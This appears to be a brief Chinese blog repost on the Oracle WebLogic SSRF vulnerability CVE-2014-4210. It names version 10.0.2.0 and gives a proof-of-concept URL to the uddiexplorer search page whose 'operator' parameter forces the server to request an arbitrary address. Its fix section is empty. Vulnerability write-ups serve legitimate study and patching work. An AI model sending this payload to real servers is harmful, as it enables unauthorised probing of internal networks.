Oracle WebLogic Server 是一个统一的可扩展平台,专用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。它提供了一种强健、成熟和可扩展的Java Enterprise Edition (EE) 和 Jakarta EE 实施方式。
Oracle WebLogic Server 10.0.2.0
0X02 漏洞复现
POC:
http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
0X03 修复建议
0X04
原文始发于微信公众号(皓月的笔记本):Weblogic SSRF漏洞(CVE-2014-4210)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论